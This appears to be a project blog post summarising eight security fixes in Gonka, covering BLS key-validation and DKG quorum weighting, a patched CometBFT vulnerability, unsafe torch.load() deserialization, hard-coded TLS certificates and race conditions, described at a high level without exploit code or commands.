Security Hardening: CertiK Audit Fixes for BLS, CometBFT, ML

Eight Fixes, One Coordinated Push

Between March 6 and March 12, the Gonka development team shipped eight security fixes in a concentrated hardening effort. The fixes span BLS cryptography, consensus logic, ML pipeline safety, and TLS configuration — addressing findings from the ongoing CertiK audit alongside internally discovered issues.

BLS Cryptography Fixes

Two related issues targeted the BLS (Boneh-Lynn-Shacham) signature scheme used in Gonka’s Distributed Key Generation:

Group key validation fallback removed (#848, #851). When previous epoch data was unavailable, the validation logic fell back to self-validation — effectively letting a node confirm its own keys. The fix removes this fallback entirely, requiring proper cross-validation in all cases.

DKG dealer consensus weight mismatch (#849, #852). Dealer consensus was counting unweighted participant votes, but the quorum threshold was calculated using slot weights. This mismatch could theoretically allow consensus to be reached with insufficient actual stake. The fix aligns both sides to use slot-weighted votes.

CertiK Audit Findings

CSA-2026-001 (Tachyon vulnerability) (#652, #675). This CometBFT vulnerability, disclosed through CertiK’s audit, was patched by upgrading to CometBFT v0.38.21. The fix was coordinated with the broader Cosmos ecosystem response.

BLS audit fixes (#822). A batch of BLS-related corrections based directly on CertiK’s audit findings, covering edge cases in key generation and validation flows.

ML Pipeline Security

Remote Code Execution via torch.load() (#863). The training pipeline used torch.load() without safety restrictions, which can execute arbitrary Python code embedded in serialized model files. The fix applies safe deserialization practices.

Hard-coded TLS credentials (#865). The Gloo transport layer in the training manager used dummy TLS certificates baked into the codebase. These were replaced with properly generated credentials.

Concurrency and Stability

Data race conditions (#543). Multiple race conditions across various components were identified and resolved, improving stability under concurrent load.

Impact

All eight fixes are included in the upcoming v0.2.11 release. None required emergency patches — the team identified and resolved them proactively through audit review and internal testing.

post-human blog▊

Security Hardening: Eight Fixes from CertiK Audit and Internal Review